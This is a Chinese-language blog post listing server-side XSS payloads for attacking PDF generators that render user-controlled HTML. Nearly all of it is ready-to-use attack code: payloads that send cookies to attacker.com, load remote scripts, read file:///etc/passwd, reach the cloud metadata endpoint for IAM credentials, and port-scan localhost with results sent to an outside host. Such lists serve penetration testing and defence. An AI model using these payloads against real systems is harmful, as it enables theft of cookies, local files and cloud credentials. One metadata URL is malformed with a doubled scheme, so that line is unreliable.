Server Side XSS (Dynamic PDF))

基本介绍

如果一个网页正在使用用户控制的输入创建一个PDF,您可以尝试欺骗创建PDF的机器人执行任意JS代码,PDF creator bot发现某种HTML标签后它将解释它们,您可以滥用这种行为来导致服务器XSS,需要注意的是<script><\\\\script>标记并不总是有效,所以您需要一个不同的方法来执行JS(例如:滥用<img),另外在常规的开发中

在常规开发中将能够看到下载创建的pdf,因此您将能够看到您通过JS编写的所有内容(例如:使用document.write()),如果您看不到创建的PDF您可能需要提取向您发出web请求的信息

常用载荷

Discovy Payload

<!-- Basic discovery, Write somthing--><img src=\\\"x\\\" onerror=\\\"document.write(\\\'test\\\')\\\" /><script>document.write(JSON.stringify(window.location))</script><script>document.write(\\\'<iframe src=\\\"\\\'+window.location.href+\\\'\\\"></iframe>\\\')</script>
<!--Basic blind discovery, load a resource--><img src=\\\"http://attacker.com\\\"/><img src=x onerror=\\\"location.href=\\\'http://attacker.com/?c=\\\'+ document.cookie\\\"><script>new Image().src=\\\"http://attacker.com/?c=\\\"+encodeURI(document.cookie);</script><link rel=attachment href=\\\"http://attacker.com\\\">

SVG Payload

在这个SVG有效负载中可以使用以下任何先前的有效负载,以一个iframe访问burpcollaborator子域和另一个iframe访问元数据端点为例

<svg xmlns:xlink=\\\"http://www.w3.org/1999/xlink\\\" version=\\\"1.1\\\" class=\\\"root\\\" width=\\\"800\\\" height=\\\"500\\\">    <g>        <foreignObject width=\\\"800\\\" height=\\\"500\\\">            <body xmlns=\\\"http://www.w3.org/1999/xhtml\\\">                <iframe src=\\\"http://redacted.burpcollaborator.net\\\" width=\\\"800\\\" height=\\\"500\\\"></iframe>                <iframe src=\\\"http://169.254.169.254/latest/meta-data/\\\" width=\\\"800\\\" height=\\\"500\\\"></iframe>            </body>        </foreignObject>    </g></svg>

<svg width=\\\"100%\\\" height=\\\"100%\\\" viewBox=\\\"0 0 100 100\\\" xmlns=\\\"http://www.w3.org/2000/svg\\\"> <circle cx=\\\"50\\\" cy=\\\"50\\\" r=\\\"45\\\" fill=\\\"green\\\" id=\\\"foo\\\"/> <script type=\\\"text/javascript\\\"> // <![CDATA[ alert(1); // ]]></script></svg>

你可以通过访问以下链接获取更多载荷:

https://github.com/allanlw/svg-cheatsheet

Path disclosure

<!-- If the bot is accessing a file:// path, you will discover the internal pathif not, you will at least have wich path the bot is accessing --><img src=\\\"x\\\" onerror=\\\"document.write(window.location)\\\" /><script> document.write(window.location) </script>

Load an external script

<script src=\\\"http://attacker.com/myscripts.js\\\"></script><img src=\\\"xasdasdasd\\\" onerror=\\\"document.write(\\\'<script src=\\\"https://attacker.com/test.js\\\"></script>\\\')\\\"/>

Read local file

<script>x=new XMLHttpRequest;x.onload=function(){document.write(btoa(this.responseText))};x.open(\\\"GET\\\",\\\"file:///etc/passwd\\\");x.send();</script>
<script>    xhzeem = new XMLHttpRequest();    xhzeem.open(\\\"GET\\\",\\\"file:///etc/passwd\\\");    xhzeem.send();    xhzeem.onload = function(){document.write(this.responseText);}    xhzeem.onerror = function(){document.write(\\\'failed!\\\')}</script>
<iframe src=file:///etc/passwd></iframe><img src=\\\"xasdasdasd\\\" onerror=\\\"document.write(\\\'<iframe src=file:///etc/passwd></iframe>\\\')\\\"/><link rel=attachment href=\\\"file:///root/secret.txt\\\"><object data=\\\"file:///etc/passwd\\\"><portal src=\\\"file:///etc/passwd\\\" id=portal>

Get external web page response as attachment (metadata endpoints)

<link rel=attachment href=\\\"http://http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\">

Bot delay

<!--Make the bot send a ping every 500ms to check how long does the bot wait--><script>    let time = 500;    setInterval(()=>{        let img = document.createElement(\\\"img\\\");        img.src = `https://attacker.com/ping?time=${time}ms`;        time += 500;    }, 500);</script><img src=\\\"https://attacker.com/delay\\\">

Port Scan

<!--Scan local port and receive a ping indicating which ones are found--><script>const checkPort = (port) => {    fetch(`http://localhost:${port}`, { mode: \\\"no-cors\\\" }).then(() => {        let img = document.createElement(\\\"img\\\");        img.src = `http://attacker.com/ping?port=${port}`;    });}
for(let i=0; i<1000; i++) { checkPort(i);}</script><img src=\\\"https://attacker.com/startingScan\\\">

Referer

https://lbherrera.github.io/lab/h1415-ctf-writeup.html

Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34304.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月13日 下午7:20
下一篇 2024年4月13日 下午7:22

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注